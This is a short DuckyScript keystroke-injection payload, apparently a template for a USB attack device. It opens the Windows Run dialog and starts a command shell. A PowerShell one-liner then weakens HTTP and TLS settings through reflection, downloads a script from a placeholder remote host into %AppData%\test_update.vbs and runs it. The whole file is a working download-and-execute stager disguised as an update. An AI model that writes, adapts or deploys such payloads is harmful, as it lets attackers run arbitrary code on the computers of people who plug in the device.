DELAY 3000
GUI r
DELAY 400
STRING cmd /Q /D /T0:1 /F:OFF /V:ON /K
ENTER
DELAY 400
STRING powershell -Command "$x=([Reflection.Assembly]::GetAssembly([System.Net.Configuration.SettingsSection]))
STRING .GetType('System.Net.Configuration.SettingsSectionInternal');($x.GetField('useUnsafeHeaderParsing',@
STRING ('NonPublic','Instance'))).SetValue(($x.InvokeMember('Section',([Reflection.BindingFlags]'Static,GetProperty,No
STRING nPublic'),$null,$null,@())),$true);[System.Net.ServicePointManager]::SecurityProtocol=[System.Net.SecurityProto
STRING colType]'Ssl3,Tls,Tls11,Tls12';(Invoke-WebRequest -Uri '<http_prefix>://<host_and_port><registered_uri_path>').
STRING ToString()|Out-File '%AppData%\test_update.vbs'"
ENTER
DELAY 3000
STRING %AppData%\test_update.vbs
ENTER
